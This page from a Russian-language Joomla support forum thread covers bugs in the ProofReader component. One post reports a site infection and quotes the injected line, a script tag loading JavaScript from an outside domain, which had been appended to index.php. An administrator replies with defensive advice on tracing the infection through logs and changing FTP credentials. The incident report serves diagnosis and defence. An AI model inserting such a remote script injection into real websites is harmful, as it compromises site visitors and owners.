LiveInternetMail.ru
Форум русской поддержки Joomla!® CMS
24.05.2013, 15:58:31 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 2.5 FAQ Joomla 1.5 FAQ Joomla 1.0 FAQ Правила форума Новости Joomla Войти Регистрация Помощь  
Страниц: 1 2 3 4 5 6 7 8 9 10 11 12 [13]   Вниз
  Добавить закладку  |  Печать  
Автор Тема: Ошибки ProofReader 1.0 RC10 для Joomla 1.0.x/1.5.x  (Прочитано 187189 раз)
0 Пользователей и 1 Гость смотрят эту тему.
era
Администратор
*****

Репутация: +363/-4
Offline Offline

Пол: Мужской
Сообщений: 1992


В туалете лучше быть пользователем, чем админом.


« : 22.02.2009, 14:39:20 »

сам компонент скачать можно тут
Native версия для Joomla 1.0.x/1.5.x

Отписывайтесь о всех ошибках здесь.
UPD: Версия 1.0 RC10 от 03.03.2011
« Последнее редактирование: 18.04.2011, 21:38:25 от era » Записан
 
ecolora
Живу я здесь
******

Репутация: +151/-0
Offline Offline

Пол: Мужской
Сообщений: 1112


творец


« Ответ #361 : 12.03.2012, 10:18:00 »

Я могу ошибаться, но, возможно последняя существующая на данный момент версия также обладает уязвимостью.

Дело вот в чем. У меня в подшефстве есть сайт моего друга... адрес http://napalkoff.ru, во-первых на нем установлено не так много компонентов, во-вторых все установленные на нём компоненты периодически обновляются (я слежу за обновлениями по RSS, через e-mail и другими способами). Периодичность эта - не более полугода, а то и чаще (взять расширения от известной команды NoNumber).

Единственный компонент, который на нем не обновлялся уже давно, по независящим от меня причинам - это ProofReader.

И вот приблизительно с месяц назад я начал ловить на этом сайте вирусы... сегодня был второй случай. Способ заражения один и тот же. В конец файла с расширением index.php добавляется код вида:

Код:
<script src="http://bdnbah.info/style.js"></script>

Слава Богу, что этот код был только в одном главном файле index.php

Если бы были заражены все файлы с расширением PHP я бы конечно прибегнул к собственно-ручно разработанному способу.

Поиск и замена одинаковой строки всех файлов сайта

Но в данном случае это не потребовалось. После "исцеления" была проведена инспекция сайта. Все обновления имеют последние версии...

Стоит, вернее стояло ProofReader версии 1.0 RC10 от 03.03.2011

Возможно, дело и не в нем.

Кто что скажет? Может у кого-то есть больше информации?
« Последнее редактирование: 30.05.2012, 02:11:17 от ecolora » Записан
lottis
Давно я тут
****

Репутация: +11/-0
Offline Offline

Пол: Мужской
Сообщений: 200



« Ответ #362 : 29.05.2012, 23:59:20 »


Стоит, вернее стояло ProofReader версии 1.0 RC10 от 03.03.2011

Кто что скажет? Может у кого-то есть больше информации?
Да несомненно нужно проверять компоненту на уязвимость, хотя дело может быть не в нем. Я вот сейчас сомневаюсь что использовать - писать свой простенький скрипт с функцией мейла или пользоваться этим вариантом. Возможно просмотрю полностью код и если не найду дыр то буду юзать этот вариант.

А кто занимается его модернизацией и разработкой? Может быть разработчик что-то нам подскажет?
Записан
era
Администратор
*****

Репутация: +363/-4
Offline Offline

Пол: Мужской
Сообщений: 1992


В туалете лучше быть пользователем, чем админом.


« Ответ #363 : 30.05.2012, 00:10:23 »

А кто занимается его модернизацией и разработкой? Может быть разработчик что-то нам подскажет?
пока только ecolora и от тебя слышу.

И вот приблизительно с месяц назад я начал ловить на этом сайте вирусы... сегодня был второй случай. Способ заражения один и тот же. В конец файла с расширением index.php добавляется код вида:
обычно так работает вирус крадущий FTP-данные на хостинг.

P.S> метод заражения определяется довольно просто - смотрите дату изменения файла со вставленным вирусом (JS-вставкой). Далее в access.log смотрите в это-же время куда были обращения, в какому компоненту. Если в это время не было обращений - меняйте данные на FTP, проверяйте все компы на вирусы, которые имели доступ к FTP.
Записан
lottis
Давно я тут
****

Репутация: +11/-0
Offline Offline

Пол: Мужской
Сообщений: 200



« Ответ #364 : 30.05.2012, 00:29:14 »

Мне компонент понравился, спасибо за разработку. У меня Joomla 1.5.26 и ваша 10 версия - полет нормальный. Единственное что думаю НУЖНО сказать пользователям в первой теме и выделить это красным - так это то, что по умолчанию компонент работает используя сочетания клавиш Sift+Enter. Читая отзывы в этой ветке я понимаю что у тех, у кого "не работает" - могло не работать именно по этому обстоятельству, так как многие привыкли проверять только сочетание Ctrl+Enter.

Еще немного не разобрался с параметрами TOP и left. Нашел где они в скрипте прописаны, но вот их изменение не привело вообще ни к чему. А хотелось-бы указания не заданного отступа от верха в 50 пикселей, а отступа в процентном соотношении. Так как экраны разные, а дизайнерские "вкусы" вообще у каждого это своя вселенная.))

У меня в таких отступах немного корявенько смотриться с моим дизайном и компонентом, зато цвет шапки 100%  попал в мой дизайн )))



Uploaded with ImageShack.us
Записан
ecolora
Живу я здесь
******

Репутация: +151/-0
Offline Offline

Пол: Мужской
Сообщений: 1112


творец


« Ответ #365 : 30.05.2012, 02:14:13 »

С тех пор, как приобрел RSFirewall, как-то стало спокойнее. :-) И реально ни одного вируса на том сайте уже несколько месяцев. Да и вообще на всех моих. Теперь все "огрехи" в обработке переменных, загружаемых файлов и вообще запросов отдаются на откуп ему (файрволу). Я даже в админке каждого сайта картинку на него сделал... шобы боялись. Azn)

Вот думаю Ваш компонент обратно на тот первый сайт поставить. Так-то вещь нужная.
Записан
Autolik
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 1


« Ответ #366 : 15.08.2012, 22:42:04 »

Я просмотрел все ветки про proofreader, но так и не нашел решения проблемы с неправищьным линком на страницу с ошибкой.
Ситуация такая: при нажатии на линк с ошибкой в администраторской части формат сылки следующая http://www.3ade.lv/administrator/3ade.lv/index.php?option=com_content&Itemid=167&catid=92&id=706&lang=ru&view=article

а правильный линк должен быть без www.3ade.lv/administrator/

кто подскажет как это исправить.
Записан
Страниц: 1 2 3 4 5 6 7 8 9 10 11 12 [13]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Рейтинг@Mail.ru Rambler Top100 Powered by SMF 1.1.18 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet